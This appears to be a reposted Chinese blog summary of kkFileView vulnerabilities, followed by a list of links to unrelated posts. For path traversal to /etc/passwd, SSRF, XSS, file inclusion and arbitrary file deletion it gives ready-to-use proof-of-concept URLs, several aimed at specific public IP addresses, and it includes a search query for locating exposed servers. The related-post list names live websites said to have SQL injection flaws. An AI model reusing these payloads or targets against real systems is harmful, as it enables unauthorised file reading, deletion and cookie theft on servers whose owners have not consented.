kkFileView漏洞总结(转)

时间：2023-05-31 18:25:24浏览次数：50

标签：总结文件 http 漏洞 kkFileview kkFileView 8012

发布时间 2023-05-04 22:18:52作者: 渗透测试中心

0x00 kkFileview存在任意文件读取漏洞

漏洞描述 Keking KkFileview是中国凯京科技（Keking）公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞，该漏洞源于存在通过目录遍历漏洞读取任意文件，可能导致相关主机上的敏感文件泄漏。 漏洞影响 kkFileview <=3.6.0 fofa查询 body="kkFile：View" 漏洞证明

http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

0x01 kkFileView SSR 漏洞

漏洞描述 kkFileview v4.1.0存在SSRF漏洞，攻击者可以利用此漏洞造成服务器端请求伪造（SSRF），远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。 漏洞影响 kkFileview =v4.1.0 漏洞证明

http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

0x03 kkFileView XSS漏洞

漏洞描述 kkFileview v4.1.0存两处XSS漏洞，可能导致网站cookies泄露。 漏洞影响 kkFileview =v4.1.0 漏洞证明 http://www.baidu.com/test.txt"><img src=111 one rror=alert(1)> 编码base64: aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg== url编码： aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D poc1: /onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E /picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E

http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

0x04 kkFileView任意文件上传导致xss和文件包含漏洞

漏洞描述 kkFileview全版本存在文件解析漏洞，攻击者可以利用此漏洞造成存储型 XSS、文件包含或者SSRF，远程攻击者可以通过将任意JavaSript脚本上传到服务器来持久性的利用应用程序发出攻击请求 漏洞影响 kkFileView=4.1.0 漏洞证明

1、上传文件

2、访问漏洞位置
http://139.9.101.60:8012/demo/2.html

2.文件包含：

https://file.keking.cn/demo/test1.js

访问：
https://file.keking.cn/demo/test14.html

0x05 kkFileView任意文件删除漏洞

漏洞描述

kkFileview v4.0.0存在任意文件删除漏洞，可能导致系统任意文件被删除

漏洞影响

kkFileview= v4.0.0

漏洞证明

/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf（原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件)

标签：总结,文件,http,漏洞,kkFileview,kkFileView,8012
From： https://www.cnblogs.com/xbbth/p/17446987.html

【随手买】团队博客总结
设想和目标1.我们的软件要解决什么问题？是否定义得很清楚？是否对典型用户和典型场景有清晰的描述？我们的软件主要做的是车载随手买，我们之前有录制视频进行分析，有较为清晰地描述。2.是否有充足的时间来做计划?只有十天工程时间，计划时间是比较短的。再加上我们团队只有两个人，团队......
算法总结——堆栈、字符串、数组类题目
先说stack的题目stack的实现：链表，数组题目：（1）简单的：minstack，一个数组实现三个stack（2）经典的stack问题：经典汉诺塔问题，逆波兰式计算或者产生逆波兰式，简化文件路径，验证括号对是否合法，找出最长有效括号（贪心+stack求解）（3）涉及tree的遍历问题：tree中序遍历的迭代解法，二叉搜索树的两节点和（twosu......
JS监听dom高度变化方法总结
前沿：有时候我们需要监听dom的变化，比如获取父元素的高度，动态的设置子元素的高度，所以需要监听dom的高度变化，才能准确获取dom的高度，那么有哪些监听dom高度变化的方法呢？今天简单列举一下。1、MutationObserver构造函数MutationObserverAPI用来监视DOM变动。DOM的任何变动，......
golang实现设计模式之抽象工厂模式总结-代码、优缺点、适用场景
抽象工厂模式也是一种创建型的设计模式，其是在工厂模式的基础上实现更高程度的内聚。我们知道在工厂模式中，一种产品类就需要新建个对应的工厂类生成产品的实例，这会有什么问题呢？虽然工厂模式解决了简单工厂模式不好扩展的问题，实现了OCP，但一种产品就需要新建一个工厂类，比如有10000种......
linux命令小总结本人本阶段学习的linux命令。
ifconfig查看IP地址reboot重启ls查看命令 ls--help查看ls的帮助 ls-l查看详细列表 ls-a查看当前文件或者文件夹，包括隐藏文件和文件夹。 ls-la组合命令查看所有列表的文件夹和所有隐藏文件 ls/etc指定查看当前某一个目录里面的文件或者文件夹 ......
vue事件基本使用总结
vue事件的基本使用：1、使用v-on:xxx或@xxx绑定事件，其中xxx是事件名2、事件的回调需要配置咋methods对象中，最终会挂载在vue实例对象上3、methods中配置的函数，不要用箭头函数，否则this就不会只想vue实例了4、methods中配置的函数，都是被Vue所管理的函数，this指向的是vue实例或组件实......
实现memcpy()函数过程总结
1.按字节实现1）初步版本void*my_memcpy(void*dst,constvoid*src,intn){if(dst==NULL&&src==NULL&&n<=0)returnNULL;char*s=(char*)src;char*d=(char*)dst;while(n--){*d++=*s++;}returnd......
When Cyber Security Meets Machine Learning 机器学习安全分析对于安全领域的总结
链接：http://ucys.ugr.es/jnic2016/docs/MachineLearning_LiorRokachJNIC2016.pdf https://people.eecs.berkeley.edu/~adj/publications/paper-files/SecML-MLJ2010.pdf一些关键点：算了，不总结了。......
某外国购物网站存在漏洞
网址：http://test7.weeze.ru/prod_info.php?prodid=39&id=1 漏洞描述：Консервы外国购物网站存在sql注入漏洞，攻击者可利用该漏洞获取数据库信息。漏洞复现：sqlmap工具 sql修复建议： 1)严格检查输入变量的类型和格式，对于整数参数，加判断条件：不能为......
远大生命有限公司存在漏洞
网址：http://www.nkbp.com/about.php?id=1漏洞描述：远大生命科学（武汉）有限公司（原名“武汉大安制药有限公司”）是一家集药品研发、生产与销售为一体的高科技医药综合企业，位于武汉市东西湖区金银湖生态园，占地面积八万平方米。公司隶属于中国远大集团，是集团生物板块龙头单位--远大生命科......